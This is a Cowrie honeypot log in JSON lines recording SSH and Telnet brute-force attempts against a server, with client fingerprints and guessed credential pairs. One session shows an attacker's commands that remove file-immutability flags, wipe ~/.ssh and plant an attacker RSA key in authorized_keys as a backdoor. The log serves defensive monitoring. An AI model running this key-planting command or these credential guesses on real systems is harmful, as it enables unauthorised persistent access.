{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:37:01.193734Z","src_ip":"212.227.235.229","session":"8af45d35a1ce"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:37:01.875891Z","src_ip":"212.227.235.229","session":"b5ed6700167b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:37:02.309845Z","src_ip":"212.227.235.229","session":"8af45d35a1ce"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:37:02.580247Z","src_ip":"212.227.235.229","session":"66dea7c913e8"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:37:02.581182Z","src_ip":"212.227.235.229","session":"8af45d35a1ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57990,"dst_ip":"1.2.3.4","dst_port":22,"session":"6c63673c7fd4","protocol":"ssh","message":"New connection: 212.227.235.229:57990 (1.2.3.4:22) [session: 6c63673c7fd4]","sensor":"my-vps","timestamp":"2025-08-26T04:37:20.641597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:37:20.642347Z","src_ip":"212.227.235.229","session":"6c63673c7fd4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:37:20.714607Z","src_ip":"212.227.235.229","session":"6c63673c7fd4"}
{"eventid":"cowrie.login.failed","username":"dev","password":"ved","message":"login attempt [dev/ved] failed","sensor":"my-vps","timestamp":"2025-08-26T04:37:21.043363Z","src_ip":"212.227.235.229","session":"6c63673c7fd4"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:37:22.118853Z","src_ip":"212.227.235.229","session":"6c63673c7fd4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51624,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9228f50eb53","protocol":"ssh","message":"New connection: 212.227.235.229:51624 (1.2.3.4:22) [session: b9228f50eb53]","sensor":"my-vps","timestamp":"2025-08-26T04:37:22.679338Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:37:22.680009Z","src_ip":"212.227.235.229","session":"b9228f50eb53"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:37:22.967968Z","src_ip":"212.227.235.229","session":"b9228f50eb53"}
{"eventid":"cowrie.login.failed","username":"pivpn","password":"pivpn123","message":"login attempt [pivpn/pivpn123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:37:24.159754Z","src_ip":"212.227.235.229","session":"b9228f50eb53"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:37:25.449155Z","src_ip":"212.227.235.229","session":"b9228f50eb53"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:37:38.662415Z","src_ip":"212.227.235.229","session":"b852d6598ba0"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":51506,"dst_ip":"1.2.3.4","dst_port":22,"session":"1470e046eb9d","protocol":"ssh","message":"New connection: 45.88.8.186:51506 (1.2.3.4:22) [session: 1470e046eb9d]","sensor":"my-vps","timestamp":"2025-08-26T04:37:39.942974Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:37:41.253686Z","src_ip":"45.88.8.186","session":"1470e046eb9d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T04:37:41.254533Z","src_ip":"45.88.8.186","session":"1470e046eb9d"}
{"eventid":"cowrie.login.success","username":"root","password":"itadmin","message":"login attempt [root/itadmin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:37:44.715132Z","src_ip":"45.88.8.186","session":"1470e046eb9d"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:37:45.599130Z","src_ip":"45.88.8.186","session":"1470e046eb9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40358,"dst_ip":"1.2.3.4","dst_port":22,"session":"ced18462da4f","protocol":"ssh","message":"New connection: 212.227.235.229:40358 (1.2.3.4:22) [session: ced18462da4f]","sensor":"my-vps","timestamp":"2025-08-26T04:38:06.001735Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:38:06.003092Z","src_ip":"212.227.235.229","session":"ced18462da4f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:38:06.271589Z","src_ip":"212.227.235.229","session":"ced18462da4f"}
{"eventid":"cowrie.login.success","username":"root","password":"zxcZXC123!@#","message":"login attempt [root/zxcZXC123!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:38:07.385208Z","src_ip":"212.227.235.229","session":"ced18462da4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:38:07.978505Z","src_ip":"212.227.235.229","session":"ced18462da4f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:38:07.979255Z","src_ip":"212.227.235.229","session":"ced18462da4f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:38:07.980311Z","src_ip":"212.227.235.229","session":"ced18462da4f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:38:08.249256Z","src_ip":"212.227.235.229","session":"ced18462da4f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:38:08.803004Z","src_ip":"212.227.235.229","session":"ced18462da4f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:38:08.803670Z","src_ip":"212.227.235.229","session":"ced18462da4f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:38:09.073502Z","src_ip":"212.227.235.229","session":"ced18462da4f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:38:09.074352Z","src_ip":"212.227.235.229","session":"ced18462da4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40360,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0a38aaa52ba","protocol":"ssh","message":"New connection: 212.227.235.229:40360 (1.2.3.4:22) [session: f0a38aaa52ba]","sensor":"my-vps","timestamp":"2025-08-26T04:38:09.339595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:38:09.340526Z","src_ip":"212.227.235.229","session":"f0a38aaa52ba"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:38:09.606857Z","src_ip":"212.227.235.229","session":"f0a38aaa52ba"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:38:10.719111Z","src_ip":"212.227.235.229","session":"f0a38aaa52ba"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:38:11.987932Z","src_ip":"212.227.235.229","session":"f0a38aaa52ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40372,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0cbaa0fe2cd","protocol":"ssh","message":"New connection: 212.227.235.229:40372 (1.2.3.4:22) [session: e0cbaa0fe2cd]","sensor":"my-vps","timestamp":"2025-08-26T04:38:12.256089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:38:12.256774Z","src_ip":"212.227.235.229","session":"e0cbaa0fe2cd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:38:12.525551Z","src_ip":"212.227.235.229","session":"e0cbaa0fe2cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43382,"dst_ip":"1.2.3.4","dst_port":23,"session":"c4ca3201b938","protocol":"telnet","message":"New connection: 212.227.125.160:43382 (1.2.3.4:23) [session: c4ca3201b938]","sensor":"my-vps","timestamp":"2025-08-26T04:38:13.180019Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:38:13.265754Z","src_ip":"212.227.125.160","session":"c4ca3201b938"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:38:13.314721Z","src_ip":"212.227.125.160","session":"c4ca3201b938"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:38:13.641276Z","src_ip":"212.227.235.229","session":"e0cbaa0fe2cd"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:38:13.911700Z","src_ip":"212.227.235.229","session":"ced18462da4f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:38:13.912637Z","src_ip":"212.227.235.229","session":"e0cbaa0fe2cd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41032,"dst_ip":"1.2.3.4","dst_port":23,"session":"1263a4932e08","protocol":"telnet","message":"New connection: 212.227.125.160:41032 (1.2.3.4:23) [session: 1263a4932e08]","sensor":"my-vps","timestamp":"2025-08-26T04:38:17.663564Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56244,"dst_ip":"1.2.3.4","dst_port":22,"session":"549e1ed84e11","protocol":"ssh","message":"New connection: 212.227.235.229:56244 (1.2.3.4:22) [session: 549e1ed84e11]","sensor":"my-vps","timestamp":"2025-08-26T04:38:18.710842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:38:18.711725Z","src_ip":"212.227.235.229","session":"549e1ed84e11"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:38:18.782911Z","src_ip":"212.227.235.229","session":"549e1ed84e11"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"M3gaP33!","message":"login attempt [ubuntu/M3gaP33!] failed","sensor":"my-vps","timestamp":"2025-08-26T04:38:19.111757Z","src_ip":"212.227.235.229","session":"549e1ed84e11"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53308,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a7c983dd669","protocol":"ssh","message":"New connection: 212.227.235.229:53308 (1.2.3.4:22) [session: 0a7c983dd669]","sensor":"my-vps","timestamp":"2025-08-26T04:38:20.023482Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:38:20.024228Z","src_ip":"212.227.235.229","session":"0a7c983dd669"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:38:20.185084Z","src_ip":"212.227.235.229","session":"549e1ed84e11"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63204,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4bba967f5ef","protocol":"ssh","message":"New connection: 217.72.205.35:63204 (1.2.3.4:22) [session: e4bba967f5ef]","sensor":"my-vps","timestamp":"2025-08-26T04:38:22.079953Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:38:22.081084Z","src_ip":"217.72.205.35","session":"e4bba967f5ef"}
